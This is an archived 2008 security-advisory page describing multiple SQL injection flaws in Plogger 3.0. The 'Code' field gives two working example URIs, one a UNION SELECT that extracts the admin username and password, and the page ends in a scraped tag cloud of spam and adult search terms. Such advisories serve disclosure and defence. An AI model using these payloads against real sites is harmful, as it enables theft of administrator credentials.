about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Plogger Multiple SQL Injection Vulnerabilities


Title Plogger Multiple SQL Injection Vulnerabilities
Published 2008-08-05-12:00AM
Updated 2008-08-05-07:36PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  James Bercegay of the GulfTech Security Research Team
Vulnerable  Plogger Plogger 3.0
Not Vulnerable  
Code  Attackers can use a browser to exploit these issues.The following example URIs are available:http://www.example.com/plog-download.php?dl_type=album&checked[]=' UNION SELECT concat(admin_username,char(58),admin_password),0,0,0,0,0,0,0,0,0,0,0,0,0,0 FROM plogger_config/*http://www.example.com/admin/plog-themes.php?activate=%00', `theme_dir` = concat(feed_title,char(0)) -- *
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Sun, 23 Nov 2008 08:58:36 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
CMS is Fre www.sexygi www.google wow brasil 200 /compo www.7ri.ne Aria Linux 6. WWw.Sex20. toket abg Desi chach Big ass Yader picgher Hard CMS is Fre www.bignat www.dreemq ws2_32 CMS is Fre t731t PC Gams www.humoro CMS is Fre VNC_bypaut www.fuckme 200 /compo Madna mambo Remo Fedora Cor Adultssex www.ocean. www.jk700. mambo Remo Images sex ass from b Invision www.photob picture of FOTOBUGIL mambo Remo larrymovie CMS is Fre apache 1.3 WWW.WORLDS SSH-1.99-O seks pictu ssh 2.3.1 200 /compo www.pinkwa